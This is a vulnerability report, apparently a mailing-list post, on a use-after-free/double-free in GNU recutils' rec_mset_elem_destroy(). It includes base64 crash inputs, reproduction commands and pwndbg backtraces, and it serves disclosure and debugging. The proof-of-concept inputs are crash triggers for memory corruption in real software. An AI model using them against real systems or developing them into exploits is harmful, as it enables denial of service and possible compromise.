
Use After Free in rec_mset_elem_destroy() at rec-mset.c:83


From: AiDai
Subject: Use After Free in rec_mset_elem_destroy() at rec-mset.c:83
Date: Mon, 27 Dec 2021 23:11:50 +0800

# Use After Free in rec_mset_elem_destroy() at rec-mset.c:83

## Description

A use-after-free was discovered in rec_mset_elem_destroy() at rec-mset.c:83. Depending on the input it surfaces either as a glibc double-free abort or as a segmentation fault, crashing the application (see the results for each proof of concept below).

**version**

ea03fdaf84860488e6aa09f40cfbaeca8c02fb03

```
./recsel --version
recsel (GNU recutils) 1.8.90

Copyright (C) 2010-2020 Jose E. Marchesi.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Jose E. Marchesi.


```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

### poc1

**poc**

```
base64 poc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```

**command:**

```
./recsel ./poc
```

**Result**

```
./recsel ./poc
free(): double free detected in tcache 2
[1]    663457 abort      ./recsel ./poc
```

**gdb**

```
free(): double free detected in tcache 2

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff7aa1880 ◂— 0x7ffff7aa1880
 RCX  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
 RDX  0x0
 RDI  0x2
 RSI  0x7fffffffdb40 ◂— 0x0
 R8   0x0
 R9   0x7fffffffdb40 ◂— 0x0
 R10  0x8
 R11  0x246
 R12  0x7fffffffddb0 ◂— 0x0
 R13  0x10
 R14  0x7ffff7ffb000 ◂— 0x6565726600001000
 R15  0x1
 RBP  0x7fffffffde90 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
 RSP  0x7fffffffdb40 ◂— 0x0
 RIP  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
 ► 0x7ffff7d5a18b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
   0x7ffff7d5a193 <raise+211>    xor    rax, qword ptr fs:[0x28]
   0x7ffff7d5a19c <raise+220>    jne    raise+260                <raise+260>
    ↓
   0x7ffff7d5a1c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>

   0x7ffff7d5a1c9                nop    dword ptr [rax]
   0x7ffff7d5a1d0 <killpg>       endbr64
   0x7ffff7d5a1d4 <killpg+4>     test   edi, edi
   0x7ffff7d5a1d6 <killpg+6>     js     killpg+16                <killpg+16>

   0x7ffff7d5a1d8 <killpg+8>     neg    edi
   0x7ffff7d5a1da <killpg+10>    jmp    kill                <kill>

   0x7ffff7d5a1df <killpg+15>    nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb40 ◂— 0x0
01:0008│            0x7fffffffdb48 —▸ 0x7ffff7fe0187 ◂— mov    r8, rax
02:0010│            0x7fffffffdb50 ◂— 0x1
03:0018│            0x7fffffffdb58 ◂— 0x0
04:0020│            0x7fffffffdb60 ◂— 0x0
05:0028│            0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
06:0030│            0x7fffffffdb70 —▸ 0x7fffffffdf10 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
07:0038│            0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
 ► f 0   0x7ffff7d5a18b raise+203
   f 1   0x7ffff7d39859 abort+299
   f 2   0x7ffff7da43ee __libc_message+670
   f 3   0x7ffff7dac47c
   f 4   0x7ffff7dae0ed _int_free+1837
   f 5   0x7ffff7f17db6 rec_mset_elem_destroy+38
   f 6   0x7ffff7f2c01b gl_array_list_free+59
   f 7   0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2  0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed05d0 "free(): double free detected in tcache 2") at malloc.c:5347
#4  0x00007ffff7dae0ed in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x5555555829a0, have_lock=0) at malloc.c:4201
#5  0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x5555555835a0) at rec-mset.c:83
#6  0x00007ffff7f2c01b in gl_array_list_free (list=0x5555555823c0) at gl_array_list.c:433
#7  0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at ../lib/gl_list.h:799
#8  rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9  rec_mset_destroy (mset=0x55555557e700) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe010) at rec-parser.c:979
#13 0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fucksel/__GI_raise-__GI_abort/id:000011,sig:06,src:000002,op:ext_AO,pos:112", db=db@entry=0x555555579b60) at recutl.c:238
#14 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1e8) at recutl.c:320
#15 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recsel.c:429
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308
#17 0x0000555555558fce in _start () at recsel.c:441
```

### poc2

**poc**

```
base64 poc
I/8h
```

**command:**

```
./recsel ./poc
```

**Result**

```
./recsel ./poc
[1]    44350 segmentation fault  ./recsel ./poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
__GI___libc_free (mem=0x6d) at malloc.c:3102
3102    malloc.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x1
 RCX  0x3
 RDX  0x2
 RDI  0x6d
 RSI  0x55555557a1a0 —▸ 0x55555557a180 —▸ 0x55555557a160 ◂— 0x0
 R8   0x2
 R9   0x7c
 R10  0x7ffff7f0bef6 ◂— 'rec_comment_destroy'
 R11  0x7ffff7f196c0 (rec_comment_destroy) ◂— endbr64
 R12  0x55555557a110 —▸ 0x7ffff7f5d2e0 (gl_array_list_implementation) —▸ 0x7ffff7f2c040 (gl_array_nx_create_empty) ◂— endbr64
 R13  0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
 R14  0x7fffffffe020 ◂— 0x4
 R15  0x6d
 RBP  0x55555557b410 ◂— 0x2
 RSP  0x7fffffffdf20 ◂— 0x1
 RIP  0x7ffff7db1870 (free+32) ◂— mov    rax, qword ptr [rdi - 8]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x7ffff7db1870 <free+32>         mov    rax, qword ptr [rdi - 8]
   0x7ffff7db1874 <free+36>         lea    rsi, [rdi - 0x10]
   0x7ffff7db1878 <free+40>         test   al, 2
   0x7ffff7db187a <free+42>         jne    free+96                <free+96>
    ↓
   0x7ffff7db18b0 <free+96>         mov    edx, dword ptr [rip + 0x14d9fe] <0x7ffff7eff2b4>
   0x7ffff7db18b6 <free+102>        test   edx, edx
   0x7ffff7db18b8 <free+104>        jne    free+123                <free+123>
    ↓
   0x7ffff7db18cb <free+123>        mov    rdi, rsi
   0x7ffff7db18ce <free+126>        add    rsp, 0x18
   0x7ffff7db18d2 <free+130>        jmp    munmap_chunk                <munmap_chunk>
    ↓
   0x7ffff7dac630 <munmap_chunk>    sub    rsp, 8
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdf20 ◂— 0x1
01:0008│     0x7fffffffdf28 —▸ 0x7ffff7fb2530 —▸ 0x7ffff7f06000 ◂— 0x10102464c457f
02:0010│     0x7fffffffdf30 ◂— 0x1b3
03:0018│     0x7fffffffdf38 —▸ 0x7ffff7f17db6 (rec_mset_elem_destroy+38) ◂— mov    rdi, rbp
04:0020│     0x7fffffffdf40 —▸ 0x55555557b448 ◂— 0x0
05:0028│     0x7fffffffdf48 —▸ 0x7ffff7f2c01b (gl_array_list_free+59) ◂— sub    rbx, 1
06:0030│     0x7fffffffdf50 —▸ 0x55555557a030 ◂— 0x3
07:0038│     0x7fffffffdf58 ◂— 0x3
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x7ffff7db1870 free+32
   f 1   0x7ffff7f17db6 rec_mset_elem_destroy+38
   f 2   0x7ffff7f2c01b gl_array_list_free+59
   f 3   0x7ffff7f17e23 rec_mset_destroy+67
   f 4   0x7ffff7f17e23 rec_mset_destroy+67
   f 5   0x7ffff7f17e23 rec_mset_destroy+67
   f 6   0x7ffff7f1b781 rec_rset_destroy+113
   f 7   0x7ffff7f1b781 rec_rset_destroy+113
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  __GI___libc_free (mem=0x6d) at malloc.c:3102
#1  0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x55555557b410) at rec-mset.c:83
#2  0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557a110) at gl_array_list.c:433
#3  0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at ../lib/gl_list.h:799
#4  rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#5  rec_mset_destroy (mset=0x55555557a030) at rec-mset.c:233
#6  0x00007ffff7f1b781 in rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:1024
#7  rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:994
#8  0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe020) at rec-parser.c:979
#9  0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4f4 "../../fuckresults/fucksel/__GI___libc_free-rec_mset_elem_destroy/id:000000,sig:11,src:000001,op:havoc,rep:32", db=db@entry=0x555555579b60) at recutl.c:238
#10 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1f8) at recutl.c:320
#11 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1f8) at recsel.c:429
#12 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at ../csu/libc-start.c:308
#13 0x0000555555558fce in _start () at recsel.c:441
```

### poc3

**poc**

```
base64 poc
IyAtKi0gbW9kZTogcmVjIAoKCiVyZWM6IEJvb2sKCiV5OiBUaXRsZQoKJXR5cGU6IExvY2F0aW9u
IGVudW0gbG9hbmVkIGhvbWUgdW5rbm8KCgolcmVjOiBCb29rCgoleTogVGl3bgoKJWRvYzoKKyBB
IGJvb2sgaW4gbXkgcGVyc29uYWwgY29sbGVjdGlvbi4KCgoKVGl0bGU6IEdOVSBFbWFjcyBNYW51
YVwKCkF1dGhvcjogUmljaGFyZCBNLiBTdGFsbG1hbgoKUDogRlNGCgpMb2NhdGlvbjogaG9tZQoK
CgpUaXRsZTogVGhlIENvbG91ciBvZiBNYWdpYwoKQXV0aG9yOiBUZXJyeSBQcmF0Y2hldHQKCkxv
Y2F0aW9uOiBsb2FuZWQKCgoKVGl0bGU6IE1pbyBDaWQKCkF1dGhvcjogQW5vbnltb3VhcHRlcnMu
Z251Lm9yZyBhZG1pbmlzdHJhdGlvbiBndWlkZQoKQXV0aG9yOiBOYWN0aW9ub256YWxlegoKQXV0
aG9yOiBKb3NlIEUuIE1hcmNoZXNpCgpMb2NhdGlvbjogdW5rbm93bgoKCgpUaXRsZTogWWVlbG9u
ZyBVc2VyIE1hbnVhbAoKTG9jYXRpb246IGhvbWUKCgoKIyBFbmQgb2YgYm8KCiP/
```

**command:**

```
./recinf ./poc
```

**Result**

```
./recinf ./poc
double free or corruption (fasttop)
[1]    3557061 abort      ./recinf ./poc
```

**gdb**

```
double free or corruption (fasttop)

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff7aa1880 ◂— 0x7ffff7aa1880
 RCX  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
 RDX  0x0
 RDI  0x2
 RSI  0x7fffffffdb60 ◂— 0x0
 R8   0x0
 R9   0x7fffffffdb60 ◂— 0x0
 R10  0x8
 R11  0x246
 R12  0x7fffffffddd0 ◂— 0x0
 R13  0x10
 R14  0x7ffff7ffb000 ◂— 0x62756f6400001000
 R15  0x1
 RBP  0x7fffffffdeb0 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
 RSP  0x7fffffffdb60 ◂— 0x0
 RIP  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
 ► 0x7ffff7d5a18b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
   0x7ffff7d5a193 <raise+211>    xor    rax, qword ptr fs:[0x28]
   0x7ffff7d5a19c <raise+220>    jne    raise+260                <raise+260>
    ↓
   0x7ffff7d5a1c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>

   0x7ffff7d5a1c9                nop    dword ptr [rax]
   0x7ffff7d5a1d0 <killpg>       endbr64
   0x7ffff7d5a1d4 <killpg+4>     test   edi, edi
   0x7ffff7d5a1d6 <killpg+6>     js     killpg+16                <killpg+16>

   0x7ffff7d5a1d8 <killpg+8>     neg    edi
   0x7ffff7d5a1da <killpg+10>    jmp    kill                <kill>

   0x7ffff7d5a1df <killpg+15>    nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb60 ◂— 0x0
01:0008│            0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
02:0010│            0x7fffffffdb70 —▸ 0x7fffffffdf30 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
03:0018│            0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
04:0020│            0x7fffffffdb80 —▸ 0x7ffff7f1aff0 (rec_rset_comment_disp_fn) ◂— endbr64
05:0028│            0x7fffffffdb88 ◂— 0x1
06:0030│            0x7fffffffdb90 ◂— 0x2
07:0038│            0x7fffffffdb98 ◂— 0x0
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
 ► f 0   0x7ffff7d5a18b raise+203
   f 1   0x7ffff7d39859 abort+299
   f 2   0x7ffff7da43ee __libc_message+670
   f 3   0x7ffff7dac47c
   f 4   0x7ffff7dadde5 _int_free+1061
   f 5   0x7ffff7f17db6 rec_mset_elem_destroy+38
   f 6   0x7ffff7f2c01b gl_array_list_free+59
   f 7   0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2  0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed0628 "double free or corruption (fasttop)") at malloc.c:5347
#4  0x00007ffff7dadde5 in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x555555581a30, have_lock=0) at malloc.c:4266
#5  0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x555555581f70) at rec-mset.c:83
#6  0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557d420) at gl_array_list.c:433
#7  0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at ../lib/gl_list.h:799
#8  rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9  rec_mset_destroy (mset=0x55555557d340) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579b60, rset=rset@entry=0x7fffffffe030) at rec-parser.c:979
#13 0x00007ffff7f1fcf6 in rec_parse_db (parser=0x555555579b60, db=0x7fffffffe080) at rec-parser.c:1001
#14 0x000055555555a05a in print_info_file (in=<optimized out>, file_name=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fuckinf/__GI_raise-__GI_abort/id:000012,sig:06,src:000002,op:ext_AO,pos:500") at recinf.c:125
#15 0x0000555555558f3c in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recinf.c:239
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558e20 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308
#17 0x0000555555558fde in _start () at recinf.c:234
```





